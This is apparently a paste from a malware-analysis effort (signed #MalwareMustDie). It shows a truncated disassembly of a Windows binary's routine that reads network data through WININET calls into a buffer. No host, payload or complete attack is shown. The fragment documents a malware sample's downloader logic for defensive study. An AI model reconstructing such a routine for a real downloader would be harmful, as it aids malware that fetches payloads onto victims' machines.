- 0040A55E call 0040B208h memset@MSVCRT.DLL (Import, 0 Params) target: 0040B208
- 0040A563 add esp, 10h
- 0040A566 push ebx xref: 0040A5D5
- 0040A567 push ebx
- 0040A568 lea eax, dword ptr [ebp-10h]
- 0040A56B push eax
- 0040A56C push dword ptr [ebp+08h]
- 0040A56F call dword ptr [0040C26Ch] "InternetQueryDataAvailable@WININET.DLL" (Import, 4 Params)
- 0040A575 test eax, eax
- 0040A577 je 0040A5E3h target: 0040A5E3
- 0040A579 cmp dword ptr [ebp-10h], ebx
- 0040A57C je 0040A5E3h target: 0040A5E3
- 0040A57E push dword ptr [ebp-10h]
- 0040A581 call dword ptr [0040C2E8h] malloc@MSVCRT.DLL (Import, 0 Params)
- 0040A587 pop ecx
- 0040A588 lea ecx, dword ptr [ebp-0Ch]
- 0040A58B push ecx
- 0040A58C push dword ptr [ebp-10h]
- 0040A58F mov dword ptr [ebp+0Ch], eax
- 0040A592 push eax
- 0040A593 push dword ptr [ebp+08h]
- 0040A596 call dword ptr [0040C270h] "InternetReadFile@WININET.DLL" (Import, 4 Params)
- 0040A59C test eax, eax
- 0040A59E je 0040A5D9h target: 0040A5D9
- 0040A5A0 cmp dword ptr [ebp-0Ch], ebx
- 0040A5A3 je 0040A5D9h target: 0040A5D9
- 0040A5A5 mov eax, dword ptr [ebp-08h]
- 0040A5A8 mov edi, esi
- 0040A5AA sub edi, eax
- 0040A5AC cmp dword ptr [ebp-0Ch], edi
- 0040A5AF jnc 0040A5B4h target: 0040A5B4
- 0040A5B1 mov edi, dword ptr [ebp-0Ch]
- 0040A5B4 mov ecx, dword ptr [ebp+10h] xref: 0040A5AF
- 0040A5B7 push edi
- 0040A5B8 push dword ptr [ebp+0Ch]
- 0040A5BB add ecx, eax
- 0040A5BD push ecx
- [...]
- ------
- #MalwareMustDie!
- "Thou shalt not make malware Botnet!"
Add Comment
Please, Sign In to add comment